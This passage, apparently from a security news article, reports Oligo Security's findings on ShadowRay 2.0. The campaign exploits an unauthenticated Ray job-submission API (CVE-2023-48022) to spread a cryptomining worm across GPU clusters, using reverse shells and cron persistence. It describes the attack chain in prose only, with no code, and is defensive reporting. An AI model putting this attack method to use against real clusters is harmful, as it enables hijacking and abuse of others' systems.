Shadowray 2.0 Exploits Unpatched Ray Flaw To Build Self-spreading...
Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet.
The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.
The vulnerability has remained unpatched due to a "long-standing design decision" that's consistent with Ray's development best practices, which requires it to be run in an isolated network and act upon trusted code.
The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API ("/api/jobs/") on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another.
The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like "ironern440-group" and "thisisforwork440-ops" to create repositories and stash the malicious payloads. Both accounts are no longer accessible. However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations.
The payloads, in turn, leverage the platform's orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts.
The threat actors "have turned Ray's legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters," researchers Avi Lumelsky and Gal Elbaz said.
The campaign has likely made use of large language models (LLMs) to create the GitLab payloads. This assessment is based on the malware's "structure, comments, and error handling patterns."
The infection chain involves an explicit check
